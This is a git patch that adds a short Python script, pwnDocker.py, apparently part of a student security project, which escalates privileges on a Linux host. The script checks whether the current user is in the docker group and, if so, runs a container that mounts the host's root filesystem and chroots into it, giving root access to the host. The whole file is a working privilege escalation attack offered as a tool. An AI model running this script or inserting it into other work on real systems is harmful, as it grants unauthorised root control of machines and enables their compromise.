From 190d17371360e91010546c4f01a5c83d0129ab98 Mon Sep 17 00:00:00 2001
From: roxbeecoxb <roxbeecoxb@coventry.ac.uk>
Date: Mon, 7 Dec 2020 16:11:49 +0000
Subject: [PATCH] Added docker priv esc

---
 src/pwnDocker.py | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 src/pwnDocker.py

diff --git a/src/pwnDocker.py b/src/pwnDocker.py
new file mode 100644
index 00000000..27066a03
--- /dev/null
+++ b/src/pwnDocker.py
@@ -0,0 +1,14 @@
+"""pwnDocker - A docker priv esc script by Ben Roxbee Cox"""
+import os
+from os import popen
+
+
+def main():
+    id = popen("id").read()    # Get user groups
+    if "docker" in id:  os.system("docker run -it -v /:/mnt alpine chroot /mnt")    # priv esc
+    else: print("This user is not part of the docker group. Exiting...")
+    return()
+
+
+if __name__ == '__main__':
+    main()